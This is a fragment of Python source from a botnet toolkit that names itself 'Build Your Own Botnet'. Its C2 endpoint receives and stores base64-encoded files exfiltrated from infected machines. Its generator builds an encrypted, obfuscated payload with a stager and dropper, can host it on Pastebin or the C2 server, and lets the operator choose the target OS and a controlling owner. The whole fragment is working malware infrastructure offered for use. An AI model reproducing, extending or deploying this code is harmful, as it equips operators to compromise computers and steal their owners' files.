def file_add(): """Upload new exfilrated file.""" b64_data = request.form.get('data') filetype = request.form.get('type') owner = request.form.get('owner') module = request.form.get('module') session = request.form.get('session') filename = request.form.get('filename') # decode any base64 values try: data = base64.b64decode(b64_data) except: if b64_data.startswith('_b64'): data = base64.b64decode(b64_data[6:]).decode('ascii') else: print('/api/file/add error: invalid data ' + str(b64_data)) return try: session = base64.b64decode(session) except: try: if session.startswith('_b64'): session = base64.b64decode(session[6:]).decode('ascii') except: pass # add . to file extension if necessary if not filetype: filetype = '.dat' elif not filetype.startswith('.'): filetype = '.' + filetype # generate random filename if not specified if not filename: filename = generators.variable(length=3) + filetype output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename) # add exfiltrated file to database file_dao.add_user_file(owner, filename, session, module) # save exfiltrated file to user directory with open(output_path, 'wb') as fp: fp.write(data) return filename
def main(*args, **kwargs): """ Run the generator """ #util.display(globals()['__banner'], color=random.choice(list(filter(lambda x: bool(str.isupper(x) and 'BLACK' not in x), dir(colorama.Fore)))), style='normal') if not kwargs: parser = argparse.ArgumentParser( prog='client.py', description="Generator (Build Your Own Botnet)") parser.add_argument('modules', metavar='module', action='append', nargs='*', help='module(s) to remotely import at run-time') parser.add_argument('--name', action='store', help='output file name') parser.add_argument('--icon', action='store', help='icon image file name') parser.add_argument( '--pastebin', action='store', metavar='API', help= 'upload the payload to Pastebin (instead of the C2 server hosting it)' ) parser.add_argument( '--encrypt', action='store_true', help= 'encrypt the payload with a random 128-bit key embedded in the payload\'s stager', default=False) parser.add_argument( '--compress', action='store_true', help='zip-compress into a self-extracting python script', default=False) parser.add_argument( '--freeze', action='store_true', help= 'compile client into a standalone executable for the current host platform', default=False) parser.add_argument( '--gui', action='store_true', help= 'generate client controllable via web browser GUI at https://buildyourownbotnet.com', default=False) parser.add_argument( '--owner', action='store', help= 'only allow the authenticated owner to interact with this client', default=False) parser.add_argument('--os', action='store', help='target operating system', default='nix') parser.add_argument('--architecture', action='store', help='target architecture', default='') parser.add_argument( '-v', '--version', action='version', version='0.5', ) options = parser.parse_args() else: options = collections.namedtuple('Options', [ 'host', 'port', 'modules', 'name', 'icon', 'pastebin', 'encrypt', 'compress', 'freeze', 'gui', 'owner', 'operating_system', 'architecture' ])(*args, **kwargs) # hacky solution to make existing client generator script work with package structure for web app os.chdir(ROOT) key = base64.b64encode(os.urandom(16)) var = generators.variable(3) modules = _modules(options, var=var, key=key) imports = _imports(options, var=var, key=key, modules=modules) hidden = _hidden(options, var=var, key=key, modules=modules, imports=imports) payload = _payload(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden) stager = _stager(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=payload) dropper = _dropper(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=stager) os.chdir('..') return dropper